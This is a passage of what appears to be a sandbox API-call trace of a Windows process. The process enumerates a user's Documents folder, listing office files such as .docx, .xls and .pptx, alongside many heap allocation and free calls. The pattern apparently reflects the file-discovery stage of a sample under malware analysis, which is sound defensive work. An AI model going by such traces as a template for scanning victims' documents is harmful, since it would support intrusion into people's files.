ftLastAccessTime.dwHighDateTime=0x1d5b7ab, ftLastWriteTime.dwLowDateTime=0x7c516f60, ftLastWriteTime.dwHighDateTime=0x1d5b7ab, nFileSizeHigh=0x0, nFileSizeLow=0x9142, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NzE7TJwJoje1EO.pdf", cAlternateFileName="NZE7TJ~1.PDF")) returned 1 [0091.039] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91296af0, ftCreationTime.dwHighDateTime=0x1d5bd7d, ftLastAccessTime.dwLowDateTime=0xd2c325d0, ftLastAccessTime.dwHighDateTime=0x1d5c450, ftLastWriteTime.dwLowDateTime=0xd2c325d0, ftLastWriteTime.dwHighDateTime=0x1d5c450, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P63p r8YwN7PV", cAlternateFileName="P63PR8~1")) returned 1 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df2b0 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4128 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cd0 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4090 | out: hHeap=0x680000) returned 1 [0091.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4090 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0091.040] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332e4960, ftCreationTime.dwHighDateTime=0x1d5bf09, ftLastAccessTime.dwLowDateTime=0x90bc71f0, ftLastAccessTime.dwHighDateTime=0x1d5c257, ftLastWriteTime.dwLowDateTime=0x90bc71f0, ftLastWriteTime.dwHighDateTime=0x1d5c257, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zaZpqRQJk0", cAlternateFileName="ZAZPQR~1")) returned 1 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0091.040] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332e4960, ftCreationTime.dwHighDateTime=0x1d5bf09, ftLastAccessTime.dwLowDateTime=0x90bc71f0, ftLastAccessTime.dwHighDateTime=0x1d5c257, ftLastWriteTime.dwLowDateTime=0x90bc71f0, ftLastWriteTime.dwHighDateTime=0x1d5c257, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zaZpqRQJk0", cAlternateFileName="ZAZPQR~1")) returned 0 [0091.040] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4e38 [0091.040] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.040] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.042] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.044] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\") returned="lt6ZzNEQACj\\" [0091.044] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.044] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.044] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.044] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.044] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.044] PathFindFileNameW (pszPath="") returned="" [0091.044] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e5d110, ftCreationTime.dwHighDateTime=0x1d5bcfd, ftLastAccessTime.dwLowDateTime=0x1cb81880, ftLastAccessTime.dwHighDateTime=0x1d5b8c6, ftLastWriteTime.dwLowDateTime=0x1cb81880, ftLastWriteTime.dwHighDateTime=0x1d5b8c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.045] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e5d110, ftCreationTime.dwHighDateTime=0x1d5bcfd, ftLastAccessTime.dwLowDateTime=0x1cb81880, ftLastAccessTime.dwHighDateTime=0x1d5b8c6, ftLastWriteTime.dwLowDateTime=0x1cb81880, ftLastWriteTime.dwHighDateTime=0x1d5b8c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.045] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2622ffa0, ftCreationTime.dwHighDateTime=0x1d5b850, ftLastAccessTime.dwLowDateTime=0x1dc4c530, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x1dc4c530, ftLastWriteTime.dwHighDateTime=0x1d5bdb6, nFileSizeHigh=0x0, nFileSizeLow=0xb026, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4yC3PRKC1q.ods", cAlternateFileName="4YC3PR~1.ODS")) returned 1 [0091.045] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe97ab840, ftCreationTime.dwHighDateTime=0x1d5c4bb, ftLastAccessTime.dwLowDateTime=0x9aeb7040, ftLastAccessTime.dwHighDateTime=0x1d5c33d, ftLastWriteTime.dwLowDateTime=0x9aeb7040, ftLastWriteTime.dwHighDateTime=0x1d5c33d, nFileSizeHigh=0x0, nFileSizeLow=0x6167, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FkG4zcTFIH.odp", cAlternateFileName="FKG4ZC~1.ODP")) returned 1 [0091.045] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x564e58f0, ftCreationTime.dwHighDateTime=0x1d5bdf5, ftLastAccessTime.dwLowDateTime=0x8716b6f0, ftLastAccessTime.dwHighDateTime=0x1d5c168, ftLastWriteTime.dwLowDateTime=0x8716b6f0, ftLastWriteTime.dwHighDateTime=0x1d5c168, nFileSizeHigh=0x0, nFileSizeLow=0x8839, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GcCti_fu.pptx", cAlternateFileName="GCCTI_~1.PPT")) returned 1 [0091.045] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a308260, ftCreationTime.dwHighDateTime=0x1d5c1f7, ftLastAccessTime.dwLowDateTime=0xeb0c5f80, ftLastAccessTime.dwHighDateTime=0x1d5bd8e, ftLastWriteTime.dwLowDateTime=0xeb0c5f80, ftLastWriteTime.dwHighDateTime=0x1d5bd8e, nFileSizeHigh=0x0, nFileSizeLow=0xe126, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kMFzCyZM_VYYm.docx", cAlternateFileName="KMFZCY~1.DOC")) returned 1 [0091.045] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834b3c60, ftCreationTime.dwHighDateTime=0x1d5bebd, ftLastAccessTime.dwLowDateTime=0x3db21a30, ftLastAccessTime.dwHighDateTime=0x1d5c59c, ftLastWriteTime.dwLowDateTime=0x3db21a30, ftLastWriteTime.dwHighDateTime=0x1d5c59c, nFileSizeHigh=0x0, nFileSizeLow=0xd8d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qe7r.xls", cAlternateFileName="")) returned 1 [0091.045] FindNextFileW 